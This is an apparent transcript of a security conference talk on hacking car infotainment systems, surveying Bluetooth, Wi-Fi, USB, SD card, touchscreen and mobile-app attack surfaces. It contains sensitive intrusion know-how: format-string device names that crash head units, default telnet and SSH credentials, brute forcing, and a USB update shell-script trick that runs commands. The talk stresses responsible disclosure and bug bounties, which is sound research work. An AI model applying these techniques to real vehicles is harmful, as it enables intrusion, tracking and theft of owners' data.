 My topic is car infotainment hacking methodology and attack surface scenarios so it's IVI or in vehicle infotainment or ICE also in car entertainment. So my name is Jay. That's my Twitter handle. I work as an application security engineer at bug crowd. Shout out to my colleagues also. I work as a, that's my day job but my in the Philippines we organize rootcon which is the hacker conference in the Philippines. We also that also contributed some tools. I love playing games. I'm not the creator of Thorla malware despite my family name because I'm not, I'm not even Russian so you know yeah so I love to party who doesn't right and that's caught yeah so yeah before anything else we need that inspirational quote or whatever you think about it it's not about the ride so it's the rider so yeah. So here's our scope and limitation so that you won't be disappointed with what this topic is all about. So first of all IVI or in vehicle infotainment infotainment systems what you call a shortcut it's what you have in your dashboard for modern cars wherein there's it's anything that you can play with your videos also music you don't need to touch your phone you can connect to your phone with it and then call using that so something like that. So it's purely infotainment bugs and it's attack services so what are the common vulnerabilities for infotainment? There's no canvas hacking sorry for that one but if you want to learn that there's also car hacking village uh yeah methodology security bugs but not full takeover of the car because sometimes uh infotainments have limitation in some uh there are some vehicles wherein you can control the steering wheel but uh in some cases it's in a separate module so it's on a sandbox it's different in fact there are also IVI which is which are third party add-ons for your car. So it's very inspired with what Jason Haddick's uh wrote in his github and presented at DEF CON it's the bug hunters methodology but in my case it's how to find bugs in an IVI so I'm gonna probably miss out some attack services so if you know anything let's stop or maybe you can share it to the audience so yeah for the car hacking handbook by Craig Smith these are the common attack services that you have in your car okay those are the most common the things that you can uh do to exploit your car I mean some of this entry points you can use it to maybe take over the car or play some videos on it or uh crash the system something like that or install malicious firmware on the IVI but in this talk these are the attack services that we have we have the bluetooth we have the wi-fi uh usb ports because uh you know that's where you charge your phone or you play uh your music sometimes using a usb flash drive so sd card ports for your uh to update the maps of the gps or load something probably apps so the cd room or the dvd room so that's also where you play some videos or maybe music or your DEF CON uh cd that you have to play that music and we also have the touch screen so it's not just even though you have physical access to it uh it's also a an attack surface it's an entry point for hackers so it allows you to control the console of course and there are things that you can do by just touching the touchscreen of a dashboard so audio jack I don't have any proof of concept for this yet but probably short out something for the for the IVI and then we have the cellular uh cellular connection the gb gbs etc so for the bluetooth they say that everything better uh everything's better with bluetooth not really so but it's a good so for cars for IVI it's coupled with bluetooth vulnerabilities okay so like I think two weeks ago there's a new bluetooth vulnerability uh you can jam so it most of the IVI have bluetooth right to connect your phone to your car then play some music or call someone anything jbs also so you can jam the bluetooth to uh render the owner of the car uh not be able to play his songs or Justin Bieber songs yeah yeah so there's also code execution you can you can uh execute arbitrary commands on the car on an IVI so for bluetooth but I haven't seen a poc for this yet maybe it will come out uh with other hackers in the car hacking village and of course the default pairing numbers for bluetooth we have the 00111234 or whatever so that's that those are the things that you can do right pairing numbers or malform or format string vulnerabilities uh with this kind of uh format you can actually break the system or crash the system or probably take it take you to a uh to the desktop mode of the IVI for example if it runs on windows me or windows whatever it runs so it could take you to a desktop because for example if it's a sandbox app only so there's also memory corruption send malform packages to the head unit so you can crash also the bluetooth stack so this one so yeah you can actually send you have format string specifiers in a device name you can rename your phone with with this uh percentage sign it's a format string so yeah a cv 2017 9212 was uh assigned to a bmw 330i 2011 car uh the researcher was from io active so so like i said test at your own risk so what if it takes you like i said what if it takes you to the desktop environment or debug options options of your IVI so this guy he tweeted it in twitter uh so basically set your smartphone's name to percentage x percentage h or percentage c percentage anything format string uh and connected devices so here's a 2011 bm uh bmw 330i so what it did is that he was able to crash his car and yeah break his system yeah so yeah you have badges right you can go to the people who are having their cars there right now to connect it to bluetooth and yeah if you don't know some uh you can you can go to the checklist which it is a github ripple where you can get some uh payloads or you know you can fuzz you can rename your phone address book or the song the song of your mp3 or something like that you just need to go to this uh repo so fuzzing for format string vulnerabilities or strings this is by jason haddix and daniel misler okay wi-fi so after bluetooth we have wi-fi when wi-fi is down and all you have is imagination so if there's wi-fi of course common wi-fi vulnerabilities right so you have you can be off the uh the device so that he can uh he will be able to connect to his uh to the to the wi-fi for example if there are some ivi wherein it allows you to connect to your wi-fi and you know what happens there after you will be uh you will have an ip address and this is uh you can do something with it and we'll talk about that later so there is also a way for you to update your car wherein um it's in the one of the settings update your firmware right so if it's connected to your own network and you press the update so why don't you try to uh sniff the packet and check the firmware uh where the firmware came from and you know you can also uh change the firmware if it doesn't have firmware signature validation so you can uh reverse the firmware then maybe send a backdoor firmware to someone's car so you can also connect to the wi-fi fetch the ip address then so if it's in your network now what are you going to do you just need to scan your network or if you own the network right you can see it in the router the hostname so just scan the port of the ip address that you have and then what services does it have what services does your car have for the ivi does it have ftp does it have telnet does it have ssh okay so we have if it does have telnet and the car uh the car uh the guy that owns the car is also a hacker or maybe a techie person but you know he wasn't he wasn't uh he tried to log in his credentials so you can actually sniff the uh credentials because it's insecure telnet and ftp for example so some of these interfaces have no authentication okay they don't have authentication some have authentication but have weak passwords so yeah netcat is your friend so exploit there uh if there are other services try to check if it runs on older services so pretty much like the penetration testing uh methodology that you have that you learn so this is from my car so if it has a weak weak password so try brute forcing the credentials right for example there's ssh okay try to brute force the credentials or if you know the the default password you can try it so get to know the default password of the system uh this is from amazda 2017 and yeah it it has a ssh open and that's a default password so there's a video on it just to prove that i'm not uh there is so it's not complete it's just like it's just the shell yeah so i'm kind of slow in typing because i was holding my camera yeah friends on linux emu and yep didn't continue from there just to let you know that there are uh things under the jci so this was reported so if there's people from mess that don't sue me anymore yeah this is reported already uh i value responsible disclosure so yeah right so another case uh dan keeper and that just i'll commit it from compute test gain access to the ivis root account for vokes wagon and oddy so this is the link to their report uh they didn't give enough uh details or poc for the attack but they have an exploit so by just knowing the ip address can i connect it to the same network they have their their own exploit sh uh so what you can see he was able to uh execute uh uname space minus a and it's running on q and x and look at the board it's an nvidia tigra 2 boards are yeah and yeah there's also uh this one from from one of their reports also so tell that and there's the default password so yeah if you if if you also have access to the network you can also sniff the credentials because it's tell that right it's from oddy okay who owns a oddy here throw uh don't throw away but you know just keep the hackers from uh just keep away from hackers right now okay so k takeaways from charlie miller you know uh they look at 2015 vehicles this is a big difference between car hacking and say browser hacking so 2015 is still a new uh it's an old browser uh but 2015 vehicle is still a pretty new car in fact if you own a moustache 2015 that's still a pretty new car right or if or if you own like 2010 something and it's a very high-end car or like for example maybe mercedes meds so it's still a pretty new car and for browser that's very old i mean some of the xss for example for xss attack in web so if if it's already that kind of browser so some xss payloads won't work already right so this is another one from ian samore so he also showed an analysis of the ivy system within the 2015 ds-5 1955 limited edition so he was able to connect the device to the device over tcp port 23 it's still telnet so the problem with this one it doesn't have any authentication right so just maybe use netcap or telnet and yeah here we go you can already access the uh ivy so the things that you can do there call logs data leakage the sort of things that you can do uh what have uh what has been what the driver has been doing like where did he go because of the jbs navigation and also uh some call logs that they have pretty much like that so yeah even though it's already 2015 so some manufacturers have this kind of issues so next we have the usb port or the universal serial box okay so things that you can do you have the you can install malicious apps or apps with it um you can update the firmware via the usb and um you can do sorry you can do rce or remote code execution if uh if it's vulnerable so killer usb have you heard of this usb so if you plug it to your computer it like destroys your computer so maybe if you do if you plug it it's possible that you can uh crash or maybe like um erase the data on your ivy so in most in some cases if you don't if your ivy doesn't have wi-fi but it has a usb port so you can you can buy a usb to ethernet adapters so it's another way for your car to have an ip address if if the wi-fi is locked down so in my case this is what i did so owners of mesda have been modding and installing apps to their infotainment system using the mesda uh all in one so it's all in one tweak it's in the mesda 3 revolution so i tried to check on what's with the app and um tried to look at how it's done so putting it all together from the documentation can you hear can you still hear me okay putting it all together in the documentation uh there's a documentation that allows you to update the cmu of the car so i tried to read it and there's actually a website for it and you just need to put what you can download from that website to a usb flash drive and you can already retrieve the cmu details so in one of the uh in one of the the files of that uh zip file that you downloaded from their website there's actually a a text file like this so cmd as what you can see in the last last uh line online uh a number it actually executes some uh it actually is executing a shell script so yeah i put it all together to prove that this is what a valet parking can do to you like hey can you park my car and then the attacker has a usb and yeah that's what i did so that's the plc so i created a plc on the sh file so that's this is one of the uh snippets from the shell script so that's what i did i executed the uname and there's actually a video of this one so i apologize for the chicken and the video uh yeah this is the one that i did so you can see the files yep so that as what you can see there's a usb flash drive so i was playing music so let's just try to fast forward there there so i did uh from the shell script you have the echo command so yeah i was able to execute the uname spaceman as a yeah it's shown in the screen so those are one of the dangers you know so aside from uh you can install apps you can actually execute some arbitrary commands for your car so yeah that's the code again so from the update file that you can just have on your flash drive so this is the uh let's go back this is one of the text file on the text file of the update this executes the uh info.sh and this is the what's inside the info.sh or shell script so i'm calling one of the jci tools that allows you to show to your screen and yeah that's it just to prove that there's rc so also another case uh researchers from keen security lab also found local code execution via the usb through an update uh they were not able to show up i'll see for this one maybe because of like they don't allow for all disclosure but just of uh a plc that or uh an evidence of the attack that they did there's no plc so yeah so still the same thing with an sd card slot uh basically you load the same thing so if there's an update for your car or you can update the firmware via the cd room or the dvd room then you can load something right so for mess though using this known cmu bug you can actually deploy apps through the uh custom that's the application sd so yeah you can you can create your own apps with this one it's free and yeah it's you can just uh test test it and like i said there's also touchscreen as one of the uh attack surface so you just need to connect to wi-fi to establish ip address so that's for another attack which is the wi-fi attack but for this one if you just press anything you try to rape the buttons of your car uh you can actually cause an overflow with that one so picture below from my uncle uh this what he got and yeah it's uh the uh the dialogue box so it's familiar right yeah so when you try to close that one what happens is that it takes you to the windows desktop environment and you can actually run cmd from there yeah so one of my friends from root god also uh he has a third party to his Honda car uh he also he was not doing anything but the application just just crashed and it also uh it also took him to the windows desktop environment and there's a start menu locate cmd and yeah do something like that no poc because during that time we were not yet interested with cars uh security during that time so sorry no poc for this one but yeah it happens so have you seen this youtube video video so how to mod your Porsche 911 or other car to run doom in three easy steps so is this true uh nope it's just a joke so he has a lot of videos don't so what what he did is that he just insert a a doom then the doom played on his Porsche but it's not true because he also has a funny video or a prank video wherein he was able to run doom on his toaster that's the toaster there from me he did a lot of prank videos and other uh uh other security guys thought that it it was true but it's not so yeah for gsm cellular connection phone app uh they have an app that connects to your car so it's time for some mobile testing for this one so you you're gonna try to intercept the request or you can use burp to the app and see how it goes from there so there is one finding um from this one wherein you can test the URLs you intercepted while testing the app and Trojan he wrote a uh a poc i know i mean an article about this but he didn't specify the correct you uh the exact URL so what it does is that from the mobile app there's an API that allows you to control the steering wheels and he was able to enter uh to intercept that one and if you know the VIN number of a certain car from Nissan Leaf you can actually control the steering wheels of another car okay it's Nissan Leaf so you can eavesdrop on eavesdrop on the connections so if if you have a mobile app to your car uh you can reverse engineer the app and if you're re-injuring reverse engineer the app or like view the options there at the source code uh you can get the maybe you can get the API key so i don't have plc for this one but i was able to look into one of this one and to destroy someone yeah so like i said because i uh i promote uh i work in a company that does responsible disclosure so that's why i don't have plc for the other uh app to your phone but here here are some of the programs wherein you can report some issues if you find bugs to your car so yeah earn money uh on some of the uh cars that you have there so you have the fca to bugra.com and you have tesla motors and also general motors jm from hacker one so yeah so yeah it's not just xss for uh reporting bugs so i already did a demo on the car so yeah that's from csi whatever csi whatever oh yeah it's uh and sorry sorry yeah sorry okay so here are my references to the talk that i have so thank you google for the memes uh for some of the uh researchers that has uh poc for the car so as much as you can see it's really risky final thoughts on this one is that maybe limit the connectivity and don't just leave your car alone to the to the one who parks your car yeah maybe there's a vulnerability that allows you to update the firmware and you know steal some of the data in your your car those are my references and that's it just a short talk but you know if you have any questions